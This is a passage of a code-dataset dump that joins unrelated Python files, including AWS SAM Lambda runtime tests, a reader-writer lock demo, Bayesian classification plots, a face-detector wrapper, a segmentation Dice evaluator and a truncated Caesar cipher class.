game.tank_tile.rect.x > 0:\n #game.tank_tile.move_left()\n#if game.pressed.get(pygame.K_s):\n #game.tank_tile.move_down()\n#if game.pressed.get(pygame.K_z):\n #game.tank_tile.move_up()\n#if game.pressed.get(\n #pygame.K_d) and game.tank_tile.rect.x + game.tank_tile.rect.width < screen.get_width():\n #game.tank_tile.move_right()\n#if game.pressed.get(pygame.K_a):\n #game.tank_tile.angleleft()\n#if game.pressed.get(pygame.K_e):\n #game.tank_tile.angleright()\n#game.tank_tile.rotate()\n#pygame.display.flip()\n#for event in pygame.event.get():\n #if event.type == pygame.QUIT:\n #run = False\n #elif event.type == pygame.KEYDOWN:\n #game.pressed[event.key] = True\n #elif event.type == pygame.KEYUP:\n #game.pressed[event.key] = False\n","sub_path":"tests/main_test_Chelsie.py","file_name":"main_test_Chelsie.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"112963675","text":"\n\n#calss header\nclass _NOSE():\n\tdef __init__(self,): \n\t\tself.name = \"NOSE\"\n\t\tself.definitions = [u'the part of the face that sticks out above the mouth, through which you breathe and smell: ', u'the particular smell of a wine: ', u'the front of a vehicle, especially an aircraft: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_nose.py","file_name":"_nose.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"196634172","text":"import shutil\nimport io\nimport logging\nimport json\nimport random\nimport threading\n\nfrom collections import namedtuple\nfrom timeit import default_timer as timer\nfrom unittest import TestCase\nfrom parameterized import parameterized, param\n\nfrom tests.functional.function_code import nodejs_lambda, make_zip, ECHO_CODE, SLEEP_CODE, GET_ENV_VAR\nfrom samcli.lib.utils.stream_writer import StreamWriter\nfrom samcli.local.docker.manager import ContainerManager\nfrom samcli.local.lambdafn.runtime import LambdaRuntime\nfrom samcli.local.lambdafn.config import FunctionConfig\nfrom samcli.local.layers.layer_downloader import LayerDownloader\nfrom samcli.local.docker.lambda_image import LambdaImage\n\nlogging.basicConfig(level=logging.INFO)\n\nRUNTIME = \"nodejs4.3\"\nHANDLER = \"index.handler\"\nMEMORY = 1024\n\n\nclass TestLambdaRuntime(TestCase):\n\n # Approx Number of seconds it takes to startup a Docker container. This helps us measure\n # the approx time that the Lambda Function actually ran for\n CONTAINER_STARTUP_OVERHEAD_SECONDS = 5\n\n def setUp(self):\n self.code_dir = {\n \"echo\": nodejs_lambda(ECHO_CODE),\n \"sleep\": nodejs_lambda(SLEEP_CODE),\n \"envvar\": nodejs_lambda(GET_ENV_VAR)\n }\n\n self.container_manager = ContainerManager()\n layer_downloader = LayerDownloader(\"./\", \"./\")\n self.lambda_image = LambdaImage(layer_downloader, False, False)\n self.runtime = LambdaRuntime(self.container_manager, self.lambda_image)\n\n def tearDown(self):\n for _, dir in self.code_dir.items():\n shutil.rmtree(dir)\n\n def test_echo_function(self):\n timeout = 3\n input_event = '{\"a\":\"b\"}'\n expected_output = b'{\"a\":\"b\"}'\n\n config = FunctionConfig(name=\"helloworld\",\n runtime=RUNTIME,\n handler=HANDLER,\n code_abs_path=self.code_dir[\"echo\"],\n layers=[],\n timeout=timeout)\n\n stdout_stream = io.BytesIO()\n stdout_stream_writer = StreamWriter(stdout_stream)\n\n self.runtime.invoke(config, input_event, stdout=stdout_stream_writer)\n\n actual_output = stdout_stream.getvalue()\n self.assertEquals(actual_output.strip(), expected_output)\n\n def test_function_timeout(self):\n \"\"\"\n Setup a short timeout and verify that the container is stopped\n \"\"\"\n stdout_stream = io.BytesIO()\n stdout_stream_writer = StreamWriter(stdout_stream)\n\n timeout = 1 # 1 second timeout\n sleep_seconds = 20 # Ask the function to sleep for 20 seconds\n\n config = FunctionConfig(name=\"sleep_timeout\",\n runtime=RUNTIME,\n handler=HANDLER,\n code_abs_path=self.code_dir[\"sleep\"],\n layers=[],\n timeout=timeout)\n\n # Measure the actual duration of execution\n start = timer()\n self.runtime.invoke(config, str(sleep_seconds), stdout=stdout_stream_writer)\n end = timer()\n\n # Make sure that the wall clock duration is around the ballpark of timeout value\n wall_clock_func_duration = end - start\n print(\"Function completed in {} seconds\".format(wall_clock_func_duration))\n # The function should *not* preemptively stop\n self.assertGreater(wall_clock_func_duration, timeout - 1)\n # The function should not run for much longer than timeout.\n self.assertLess(wall_clock_func_duration, timeout + self.CONTAINER_STARTUP_OVERHEAD_SECONDS)\n\n # There should be no output from the function because timer was interrupted\n actual_output = stdout_stream.getvalue()\n self.assertEquals(actual_output.strip(), b\"\")\n\n @parameterized.expand([\n (\"zip\"),\n (\"jar\"),\n (\"ZIP\"),\n (\"JAR\")\n ])\n def test_echo_function_with_zip_file(self, file_name_extension):\n timeout = 3\n input_event = '\"this input should be echoed\"'\n expected_output = b'\"this input should be echoed\"'\n\n code_dir = self.code_dir[\"echo\"]\n with make_zip(code_dir, file_name_extension) as code_zip_path:\n\n config = FunctionConfig(name=\"helloworld\",\n runtime=RUNTIME,\n handler=HANDLER,\n code_abs_path=code_zip_path,\n layers=[],\n timeout=timeout)\n\n stdout_stream = io.BytesIO()\n stdout_stream_writer = StreamWriter(stdout_stream)\n\n self.runtime.invoke(config, input_event, stdout=stdout_stream_writer)\n\n actual_output = stdout_stream.getvalue()\n self.assertEquals(actual_output.strip(), expected_output)\n\n def test_check_environment_variables(self):\n variables = {\"var1\": \"value1\", \"var2\": \"value2\"}\n aws_creds = {\"region\": \"ap-south-1\", \"key\": \"mykey\", \"secret\": \"mysecret\"}\n\n timeout = 30\n input_event = \"\"\n\n stdout_stream = io.BytesIO()\n stdout_stream_writer = StreamWriter(stdout_stream)\n\n expected_output = {\n \"AWS_SAM_LOCAL\": \"true\",\n \"AWS_LAMBDA_FUNCTION_MEMORY_SIZE\": \"1024\",\n \"AWS_LAMBDA_FUNCTION_TIMEOUT\": \"30\",\n \"AWS_LAMBDA_FUNCTION_HANDLER\": \"index.handler\",\n\n # Values coming from AWS Credentials\n \"AWS_REGION\": \"ap-south-1\",\n \"AWS_DEFAULT_REGION\": \"ap-south-1\",\n \"AWS_ACCESS_KEY_ID\": \"mykey\",\n \"AWS_SECRET_ACCESS_KEY\": \"mysecret\",\n\n # Custom environment variables\n \"var1\": \"value1\",\n \"var2\": \"value2\"\n }\n\n config = FunctionConfig(name=\"helloworld\",\n runtime=RUNTIME,\n handler=HANDLER,\n code_abs_path=self.code_dir[\"envvar\"],\n layers=[],\n memory=MEMORY,\n timeout=timeout)\n\n # Set the appropriate environment variables\n config.env_vars.variables = variables\n config.env_vars.aws_creds = aws_creds\n\n self.runtime.invoke(config, input_event, stdout=stdout_stream_writer)\n\n actual_output = json.loads(stdout_stream.getvalue().strip().decode('utf-8')) # Output is a JSON String. Deserialize.\n\n # Make sure all key/value from expected_output is present in actual_output\n for key, value in expected_output.items():\n # Do the key check first to print a nice error error message when it fails\n self.assertTrue(key in actual_output, \"'{}' should be in environment variable output\".format(key))\n self.assertEquals(actual_output[key], expected_output[key],\n \"Value of environment variable '{}' differs fromm expectation\".format(key))\n\n\nclass TestLambdaRuntime_MultipleInvokes(TestCase):\n\n def setUp(self):\n self.code_dir = nodejs_lambda(SLEEP_CODE)\n\n Input = namedtuple('Input', [\"timeout\", \"sleep\", \"check_stdout\"])\n self.inputs = [\n Input(sleep=1, timeout=10, check_stdout=True),\n Input(sleep=2, timeout=10, check_stdout=True),\n Input(sleep=3, timeout=10, check_stdout=True),\n Input(sleep=5, timeout=10, check_stdout=True),\n Input(sleep=8, timeout=10, check_stdout=True),\n Input(sleep=13, timeout=12, check_stdout=False), # Must timeout\n Input(sleep=21, timeout=20, check_stdout=False), # Must timeout. So stdout will be empty\n ]\n random.shuffle(self.inputs)\n\n container_manager = ContainerManager()\n layer_downloader = LayerDownloader(\"./\", \"./\")\n self.lambda_image = LambdaImage(layer_downloader, False, False)\n self.runtime = LambdaRuntime(container_manager, self.lambda_image)\n\n def tearDown(self):\n shutil.rmtree(self.code_dir)\n\n def _invoke_sleep(self, timeout, sleep_duration, check_stdout, exceptions=None):\n\n name = \"sleepfunction_timeout_{}_sleep_{}\".format(timeout, sleep_duration)\n print(\"Invoking function \" + name)\n try:\n stdout_stream = io.BytesIO()\n stdout_stream_writer = StreamWriter(stdout_stream)\n\n config = FunctionConfig(name=name,\n runtime=RUNTIME,\n handler=HANDLER,\n code_abs_path=self.code_dir,\n layers=[],\n memory=1024,\n timeout=timeout)\n\n self.runtime.invoke(config, sleep_duration, stdout=stdout_stream_writer)\n actual_output = stdout_stream.getvalue().strip() # Must output the sleep duration\n if check_stdout:\n self.assertEquals(actual_output.decode('utf-8'), str(sleep_duration))\n except Exception as ex:\n if exceptions is not None:\n exceptions.append({\"name\": name, \"error\": ex})\n else:\n raise\n\n def test_serial(self):\n \"\"\"\n Making sure we can invoke multiple times on the same ``LambdaRuntime`` object. This is test is necessary to\n catch timer that was not cancelled, race conditions, memory leak issues, etc.\n \"\"\"\n\n for input in self.inputs:\n self._invoke_sleep(input.timeout, input.sleep, input.check_stdout)\n\n def test_parallel(self):\n \"\"\"\n Making sure we can invoke multiple times on the same ``LambdaRuntime`` object. This is test is necessary to\n catch timer that was not cancelled, race conditions, memory leak issues, etc.\n \"\"\"\n\n threads = []\n\n # Collect all exceptions from threads. This is important because exceptions reported in thread don't bubble\n # to the main thread. Therefore test runner will never catch and fail the test.\n exceptions = []\n\n for input in self.inputs:\n\n t = threading.Thread(name='thread', target=self._invoke_sleep,\n args=(input.timeout, input.sleep, input.check_stdout, exceptions))\n t.setDaemon(True)\n t.start()\n threads.append(t)\n\n # Wait for all threads to exit\n for t in threads:\n t.join()\n\n for e in exceptions:\n print(\"-------------\")\n print(\"ERROR in function \" + e[\"name\"])\n print(e[\"error\"])\n print(\"-------------\")\n\n if len(exceptions) > 0:\n raise AssertionError(\"Test failed. See print outputs above for details on the thread that failed\")\n","sub_path":"tests/functional/local/lambdafn/test_runtime.py","file_name":"test_runtime.py","file_ext":"py","file_size_in_byte":10848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"33252347","text":"import logging\nfrom random import randint\nimport time\nfrom threading import Thread\n\n# _______________________________________________________________________\n# Imports\n\nfrom threading import Lock\n\n# _______________________________________________________________________\n# Class\n\n\nclass RWLock(object):\n # Constructor\n\n def __init__(self):\n\n self.w_lock = Lock()\n self.num_r_lock = Lock()\n self.num_r = 0 \n\n # Metodos de Lectura (Reading).\n\n def r_acquire(self):\n self.num_r_lock.acquire()\n self.num_r += 1\n if self.num_r == 1:\n self.w_lock.acquire()\n self.num_r_lock.release()\n\n def r_release(self):\n assert self.num_r > 0\n self.num_r_lock.acquire()\n self.num_r -= 1\n if self.num_r == 0:\n self.w_lock.release()\n self.num_r_lock.release()\n\n # Métodos de Escritura (Writing).\n\n def w_acquire(self):\n self.w_lock.acquire()\n\n def w_release(self):\n self.w_lock.release()\n\n\n#-------------------------------------------------------------------------------//\n#---------------------------------------------------------------------//\n\n\n\nlockRW = RWLock()\n\npartido = [\"\",0,\"\",0] \n\nequipos = [\"Boca\", \"River\", \"Racing\", \"Independiente\", \"San Lorenzo\", \"Huracán\", \n\"Gimnasia\", \"Estudiantes\", \"Velez\", \"Ferro\", \"Lanus\", \"Quilmes\"]\n\nlogging.basicConfig(format='%(asctime)s.%(msecs)03d [%(threadName)s] - %(message)s', datefmt='%H:%M:%S', level=logging.INFO)\n\n\n\ndef escritor(id):\n global partido #Le damos partido y equipos a nuestro escritor.\n global equipos\n nombre = f\"Escritor numero:{id}\" #Nombre para mejor manejo.\n while True:\n nRandom1 = randint(0,len(equipos)-1)\n nRandom2= randint(0,len(equipos)-1)\n while nRandom1 == nRandom2:\n nRandom2 = randint(0,len(equipos)-1)\n lockRW.w_acquire()\n try:\n partido[0] = equipos[nRandom1]\n partido[1] = randint(0,3)\n partido[2] = equipos[nRandom2]\n partido[3] = randint(0,3)\n logging.info(f\"{nombre} Actualizo el partido.\")\n finally:\n lockRW.w_release()\n time.sleep(randint(1,2))\n\ndef lector(id):\n global partido\n global equipos\n nombre = f\"Lector-{id}\"\n while True:\n lockRW.r_acquire()\n try:\n logging.info(f\"\"\"{nombre}: El resultado fue: {partido[0]}:{partido[1]} - {partido[2]}:{partido[3]}\"\"\")\n finally:\n lockRW.r_release()\n time.sleep(randint(1,2))\n\n\ndef main():\n hilos = []\n for i in range(1):\n writer = Thread(target=escritor, args=(i,))\n logging.info(f\"Arrancando escritor:{i}\")\n writer.start()\n hilos.append(writer)\n for i in range(4):\n reader = Thread(target=lector,args=(i,))\n logging.info(f\"Arrancando lector:{i}\")\n reader.start()\n hilos.append(escritor)\n for thread in hilos:\n thread.join()\n\nif __name__ == '__main__':\n main()","sub_path":"rwlock_PARTIDOFUTBOL.py","file_name":"rwlock_PARTIDOFUTBOL.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"48165921","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport matplotlib\nmatplotlib.rcParams['mathtext.fontset'] = 'stix'\nmatplotlib.rcParams['font.family'] = 'STIXGeneral'\n\ndef sig(x):\n return 1/(1 + np.exp(-x))\n\nnp.random.seed(0)\nx_all = np.load('x.npy')\ny_all = np.load('y.npy')\nos.chdir(os.getcwd() + '/rich_images/bayesian_master_pred')\n\nSw = np.array([[10, 0],\n [0, 10]], dtype = 'float64')\nMw = np.array([[0, 0]], dtype = 'float64').T\n\n\nw1_range = np.linspace(-10, 10, 275)\nw2_range = np.linspace(-10, 10, 300)\nw1_, w2_ = np.meshgrid(w1_range, w2_range)\ngrid = np.stack([w1_, w2_], axis = 2)\n\nidx1, idx2 = np.arange(0, 275), np.arange(0, 300)\nidx1, idx2 = np.meshgrid(idx1, idx2)\nidx = np.stack([idx1, idx2], axis = 2)\nidx = np.reshape(idx, (-1, 2))\n\nrate = 0.01\nfor n in range(51):\n \n fig = plt.figure(figsize=(20, 5))\n \n x = x_all[:n+1, :]\n y = y_all[:n+1]\n\n \n w = np.array([[0, 0]], dtype = 'float64').T\n for i in range(1000):\n grad = -np.linalg.inv(Sw).dot(w - Mw)\n sigmas = sig(x.dot(w))\n lik_term = np.sum((y*(1 - sigmas) - (1 - y)*sigmas)*x, axis = 0)\n lik_term = lik_term.reshape((-1, 1))\n grad += lik_term\n w += grad*rate\n\n\n sigmas = sig(x.dot(w))\n S_g = np.linalg.inv(Sw) + (x.T).dot(x*sigmas*(1-sigmas))\n S_g = S_g\n \n plt.subplot(142)\n sigs = None\n lik = None\n if n == 0:\n sigs = sig((grid).dot(x.T))[:, :, 0]\n lik = (sigs**y)*(1-sigs)**(1-y)\n else:\n sigs = sig((grid).dot(x[:-1].T))[:, :, -1]\n lik = (sigs**y[-1])*(1-sigs)**(1-y[-1])\n plt.contourf(-w1_range, w2_range, lik,\n cmap = 'coolwarm', alpha = 0.5)\n## plt.title('Likelihood \\n(observation {})'.format(n+1), fontsize = 18)\n## plt.xlabel(r'$b$', fontsize = 18)\n## plt.ylabel(r'$w$', fontsize = 18)\n## plt.xticks(fontsize = 13)\n## plt.yticks(fontsize = 13)\n## plt.locator_params(axis='y', nbins = 5)\n## plt.locator_params(axis='x', nbins = 5)\n plt.xticks([])\n plt.yticks([])\n\n \n\n plt.subplot(141)\n prior = None\n if n == 0:\n prior = np.exp(-1/2*np.sum(grid.dot(np.linalg.inv(Sw))*grid, axis = 2))\n else:\n sigs = sig((grid).dot(x[:-1].T))[:, :, -1]\n lik = (sigs**y[-1])*(1-sigs)**(1-y[-1])\n prior = np.exp(-1/2*np.sum(grid.dot(np.linalg.inv(Sw))*grid, axis = 2))\n sigs_prev = sig((grid).dot(x.T))[:, :, :-1]\n\n y_ = y[:-1].reshape((-1))\n lik_prev = np.prod((sigs_prev**y_)*(1-sigs_prev)**(1-y_), axis = 2)\n prior *= lik_prev\n \n plt.contourf(-w1_range, w2_range, prior,\n cmap = 'coolwarm', alpha = 0.5)\n## if n == 0:\n## plt.title('Prior \\n(before any observations)', fontsize = 18)\n## elif n == 1:\n## plt.title('Prior \\n(after 1 observation)', fontsize = 18)\n## else:\n## plt.title('Prior \\n(after {} observations)'.format(n), fontsize = 18)\n## plt.xlabel(r'$b$', fontsize = 18)\n## plt.ylabel(r'$w$', fontsize = 18)\n## plt.xticks(fontsize = 13)\n## plt.yticks(fontsize = 13)\n## plt.locator_params(axis='y', nbins = 5)\n## plt.locator_params(axis='x', nbins = 5)\n plt.xticks([])\n plt.yticks([])\n\n plt.subplot(143)\n post = None\n if n == 0:\n prior = np.exp(-1/2*np.sum(grid.dot(np.linalg.inv(Sw))*grid, axis = 2))\n sigs = sig((grid).dot(x.T))[:, :, :]\n post = prior*lik\n else:\n prior = np.exp(-1/2*np.sum(grid.dot(np.linalg.inv(Sw))*grid, axis = 2))\n sigs = sig((grid).dot(x.T))[:, :, :]\n\n y_ = y.reshape((-1))\n lik = np.prod((sigs**y_)*(1-sigs)**(1-y_), axis = 2)\n post = lik*prior\n \n plt.contourf(-w1_range, w2_range, post,\n cmap = 'coolwarm', alpha = 0.5)\n## if n == 0:\n## plt.title('Exact posterior \\n(after 1 observation)', fontsize = 18)\n## else:\n## plt.title('Exact posterior \\n(after {} observations)'.format(n+1), fontsize = 18)\n## \n## plt.xlabel(r'$b$', fontsize = 18)\n## plt.ylabel(r'$w$', fontsize = 18)\n## plt.xticks(fontsize = 13)\n## plt.yticks(fontsize = 13)\n## plt.locator_params(axis='y', nbins = 5)\n## plt.locator_params(axis='x', nbins = 5)\n plt.xticks([])\n plt.yticks([])\n \n flat_post = np.reshape(post, (-1))/post.sum()\n\n colors = ['red', 'green', 'blue']\n w1, w2 = [], []\n \n for i in range(3):\n sample_idx = np.random.choice(np.arange(0, flat_post.shape[0]), p = flat_post)\n grid_idx = idx[sample_idx]\n w1.append(w1_range[grid_idx[0]])\n w2.append(w2_range[grid_idx[1]])\n plt.scatter(-w1_range[grid_idx[0]], w2_range[grid_idx[1]],\n color = colors[i], marker = 'x')\n\n plt.subplot(144)\n xs = np.linspace(-3, 4, 100)\n for i in range(3):\n plt.plot(xs, sig(w2[i]*xs+w1[i]), color = colors[i])\n \n## plt.xlabel(r'$x$', fontsize = 18)\n## plt.ylabel(r'$p(C_{red})$', fontsize = 18)\n## plt.xticks(fontsize = 13)\n## plt.yticks([0, 0.5, 1], fontsize = 13)\n plt.xticks([])\n plt.yticks([])\n reds, blues = x[np.where(y == 1)[0], 1], x[np.where(y == 0)[0], 1]\n plt.scatter(reds, np.zeros_like(reds), marker = 'x', color = 'black', s = 40)\n plt.scatter(blues, np.zeros_like(blues), marker = 'o', color = 'white',\n edgecolor = 'black', s = 50)\n## plt.title('Data space\\n' + r'(three (w, b) samples)', fontsize = 18)\n\n print('bayesian_master_pred', str(n).zfill(2) + '.pdf')\n plt.tight_layout(w_pad = 8)\n plt.savefig(str(n).zfill(2) + '.pdf')\n plt.close(fig)\n\n \n","sub_path":"classification/bayesian_class_master_pred.py","file_name":"bayesian_class_master_pred.py","file_ext":"py","file_size_in_byte":5578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"142450605","text":"# mika.py\n# by Jonno, Dec 2018\n# talk with Mika, the cute anime girl\n\n# save messages as variables\nintro = \"Hi! I'm Mika, a cute anime girl!\"\nask = \"How can I help? (Enter help for suggestions.)\\n\"\nconfused = \"I don't understand\"\njoke = \"My dog has no nose. It smells terribly!\"\nhelpList = \"Try entering:\\njoke\\nexit\"\n\n# begin interactions\nprint(intro)\n\nwhile 1:\n\tuserInput = input(ask)\n\n\tif userInput == \"exit\":\n\t\texit()\n\n\telif userInput == \"help\":\n\t\tprint(helpList)\n\n\telif userInput == \"joke\":\n\t\tprint(joke)\n\n\telse:\n\t\tprint(confused, userInput, \".\")","sub_path":"mika.py","file_name":"mika.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"272612124","text":"import sys\ninput = sys.stdin.readline\nINF = sys.maxsize\n\nsentence = input().rstrip()\n# 아래 코드 작성 안하면 마지막 숫자를 더하거나 뺴지 않음\nsentence += '+'\ntmp = \"\"\nplus = 0\nminus = 0\nindex = INF\nfor i in range(len(sentence)):\n if sentence[i] == '-':\n index = i\n break\n\nfor i in range(len(sentence)):\n letter = sentence[i]\n if letter == ')' or letter == '(':\n continue\n else:\n # letter가 숫자\n if letter.isdigit():\n tmp += letter\n # letter가 기호\n else:\n if i > index:\n minus += int(tmp)\n else:\n plus += int(tmp)\n tmp = \"\"\nprint(plus - minus)\n\n\"\"\"\n풀이\n이 문제는 괄호를 제거하는 것, 문자열로 된 숫자를 숫자로 구분하는 것, -기호 뒤에 숫자는 전부 빼야되는 것 세 가지가 중요하다.\n인줄 알았는데 이미 입력에서 괄호를 제거했었네용...?\n문자열로 된 숫자는 tmp를 이용해서 for문을 돌 때 숫자면 tmp에 추가하고, 기호가 오면 tmp를 숫자로 인식했다.\n처음 for문을 돌 때 -의 기호의 인덱스를 index에 저장하고 for문을 돌면서 숫자로 인식 될 때의 인덱스가 index 보다 작다면 plus에,\n아니라면 minus에 더해주었다. \n\"\"\"\n","sub_path":"season2/season2/week6/minkyu/1541.py","file_name":"1541.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"509413964","text":"import os\nimport json\nimport torch\nimport bentoml\n\nfrom bentoml.adapters import ImageInput\nfrom bentoml.artifact import PytorchModelArtifact\n\nfrom core.model.utils import euclidean_distance, download_ftp, delete_file\nfrom core.model.face_align_trans import warp_and_crop_face\n\n# os.environ['CUDA_VISIBLE_DEVICES'] = '1'\n\n\nclass FTPServerConfig:\n def __init__(self):\n # if use ftp\n self.use_model_from_ftp = json.loads(os.environ.get(\"USE_MODEL_FROM_FTP\", \"False\").lower())\n self.ftp_host = os.environ.get(\"FTP_SERVER_HOST\", \"127.0.0.1\")\n self.ftp_port = int(os.environ.get(\"FTP_SERVER_PORT\", 22))\n self.ftp_user = os.environ.get(\"FTP_SERVER_USER\", \"dps\")\n self.ftp_password = os.environ.get(\"FTP_SERVER_PASSWORD\", \"123456\")\n\n\nclass ConfigFaceDetector(FTPServerConfig):\n \"\"\"\n Config of FaceDetector(RetinaFace)\n \"\"\"\n\n def __init__(self):\n super().__init__()\n import torch\n from core.model.retinaface import RetinaFace\n from core.model.model import cfg_mnet\n from core.model.model import MobileNetV1\n\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n # config of MobileNetV1\n self.model_backbone = MobileNetV1\n self.model_config = cfg_mnet\n self.model_backbone_path = \"static/retina_backbone.tar\"\n self.model = RetinaFace(self.model_backbone, self.model_config, self.device,\n backbone_path=self.model_backbone_path)\n self.model_path = \"static/retina_mobilenet.pth\"\n\n # config of Resnet50\n # self.model_backbone = models.resnet50\n # self.model_config = cfg_re50\n # self.model = RetinaFace(self.model_backbone, self.model_config, self.device)\n # self.model_path = \"./data/pretrained_model/retina_res50.pth\"\n\n self.threshold = float(os.environ.get('DETECTOR_THRESHOLD', 0.97531))\n self.face_size = (112, 112)\n self.eyes_distance = float(os.environ.get('EYES_DISTANCE', 12)) # pixels\n self.central_points_face_distances = float(os.environ.get('CENTRAL_POINTS_FACE_DISTANCES', 12)) # pixels\n\n\nclass FaceDetector:\n def __init__(self):\n self.__config = ConfigFaceDetector()\n self.__detector = self.__config.model\n\n if not self.__config.use_model_from_ftp:\n self.__detector.load_model(self.__config.model_path)\n else:\n # load model from ftp server\n # first, download model\n download_ftp(\n file_path=self.__config.model_path,\n host=self.__config.ftp_host,\n port=self.__config.ftp_port,\n user=self.__config.ftp_user,\n password=self.__config.ftp_password\n )\n self.__detector.load_model(\"tmp\") # modify this line + delete\n delete_file(\"tmp\")\n\n from core.model.face_align_trans import get_reference_facial_points\n self.__reference = get_reference_facial_points(default_square=True)\n\n def forward(self, image):\n result = []\n for face_detail in self.__detector.detect(image, self.__config.threshold):\n border = [idx for idx, pos in enumerate(face_detail[:4]) if pos > 5000 or pos < 0]\n\n if len(border) > 0:\n continue\n\n box = tuple(face_detail[:4])\n land_mask = face_detail[5:].reshape((5, 2))\n\n noise_line = euclidean_distance((land_mask[0] + land_mask[1])/2, (land_mask[3] + land_mask[4])/2)\n eyes_line = euclidean_distance(land_mask[1], land_mask[0])\n\n # if noise_line < self.__config.central_points_face_distances or eyes_line < self.__config.eyes_distance\\\n # or eyes_line/noise_line <= 0.8 or eyes_line/noise_line >= 0.98:\n if noise_line < self.__config.central_points_face_distances or eyes_line < self.__config.eyes_distance:\n continue\n\n result.append((land_mask, box))\n\n return result\n\n def warp_crop_face(self, image, land_mask, output_size=None):\n if output_size is None:\n output_size = self.__config.face_size\n\n return warp_and_crop_face(image, land_mask, self.__reference, output_size)\n\n\nnet = FaceDetector()\n","sub_path":"test/bento.py","file_name":"bento.py","file_ext":"py","file_size_in_byte":4267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"290580915","text":"def global_(answers):\n return not answers['folder_packages']\n\n\nquestions = [\n {\n 'name': 'package_manager',\n 'type': 'list',\n 'message': 'Please select appropriate package manager',\n 'choices': [\n # Package managers available\n {\n 'name': 'Chocolatey'\n },\n {\n 'name': 'Composer'\n },\n {\n 'name': 'PIP'\n },\n {\n 'name': 'NPM'\n },\n {\n 'name': 'Yarn'\n },\n {\n 'name': 'NuGet'\n },\n {\n 'name': 'Homebrew'\n },\n {\n 'name': 'APT'\n }\n ]\n },\n {\n 'name': 'folder_packages',\n 'type': 'confirm',\n 'message': 'Are the package available locally? (containerized)',\n 'default': False,\n },\n {\n 'name': 'global_packages',\n 'type': 'confirm',\n 'message': 'Are the package available globally?',\n 'default': True,\n 'when': global_,\n }\n]\n","sub_path":"package_uninstaller/extra/global_vars.py","file_name":"global_vars.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"493096904","text":"import nibabel as nib\nimport numpy as np\nimport glob\n\n\ndef dice_calculation(gt, seg):\n\n gt = nib.load(gt).get_data() \n seg = nib.load(seg).get_data() \n seg = np.squeeze(seg) \n vox_gt = np.sum(gt) \n vox_seg = np.sum(seg) \n common = np.sum(gt & seg) \n dice = (2*common)/(vox_gt+vox_seg) \n return dice\n\n\ndef outliers_modified_z_score(ys):\n\n ys = np.asarray(ys)\n threshold = 3.5\n\n median_y = np.median(ys)\n median_absolute_deviation_y = np.median([np.abs(y - median_y) for y in ys])\n modified_z_scores = [0.6745 * (y - median_y) / median_absolute_deviation_y\n for y in ys]\n return np.where(np.abs(modified_z_scores) > threshold)\n\n\nrefs = sorted(glob.glob('/home/fsforazz/Desktop/mouse_nifti/Mask_0*.nii.gz'))\nsegs = sorted(glob.glob('/home/fsforazz/niftynet/models/mouse_lung_ct/'\n 'segmentation_output_mouse_lung/*.nii.gz'))\nall_dices = []\n\nfor seg in segs: \n seg_num = seg.split('/')[-1].split('_')[1] \n ref = [x for x in refs if seg_num in x][0] \n dice = dice_calculation(ref, seg) \n all_dices.append(dice)\n\noutliers = outliers_modified_z_score(all_dices)\nprint('Mean Dice: {0} \\nStd: {1} \\nMax Dice: {2}\\nMin Dice {3}'\n .format(np.mean(all_dices), np.std(all_dices), np.max(all_dices), np.min(all_dices)))\nfor ol in outliers[0]:\n print('Outlier: {0}, Dice: {1}'.format(segs[ol], all_dices[ol]))\nprint('Done!')\n","sub_path":"scripts/segmentation_eval.py","file_name":"segmentation_eval.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"501238770","text":"\r\nfrom utils.dataLetters import *\r\nfrom utils.messagefct import *\r\n\r\n\r\nclass Cesar:\r\n\r\n @staticmethod\r\n def findOppositeKeyCesar(k):\r\n \"\"\"\r\n Donne la cle symmetrique a la cle passe en argument\r\n \"\"\"\r\n k = k % 26\r\n oppk = 26 - k\r\n\r\n return oppk\r\n # ...\r\n\r\n @staticmethod\r\n def encrypt(m, kc, nl):\r\n \"\"\"\r\n renvoie le cryptogramme pour le message m avec la clef kc par le chiffre Cesar\r\n \"\"\"\r\n\r\n if not isValidMessage(m):\r\n m = getMessage(m)\r\n # ...\r\n\r\n # on reduit potentiellement kc\r\n kc = kc % 26\r\n\r\n c = []\r\n for letter in m:\r\n l = ord(letter) - minUpperLetter\r\n c_i = (l + kc) % 26\r\n c_i = c_i + minUpperLetter\r\n c.append(chr(c_i))\r\n #...\r\n return setCryptogrammeByBloc(''.join(c), nl)\r\n # ...\r\n\r\n @staticmethod\r\n def decrypt(c, kc):\r\n \"\"\"\r\n dechiffre le cryptogramme donne dont on connait la cle de chiffrement kc\r\n \"\"\"\r\n if not isValidMessage(c):\r\n c = getMessage(c)\r\n # ...\r\n\r\n # on reduit kc\r\n kc = kc % 26\r\n\r\n # on en deduit kd\r\n kd = 26 - kc\r\n\r\n\r\n m = []\r\n for letter in c:\r\n l = ord(letter) - minUpperLetter\r\n m_i = (l + kd) % 26\r\n m_i = m_i + minUpperLetter\r\n m.append(chr(m_i))\r\n #...\r\n return ''.join(m)\r\n # ...\r\n\r\n\r\n @staticmethod\r\n def 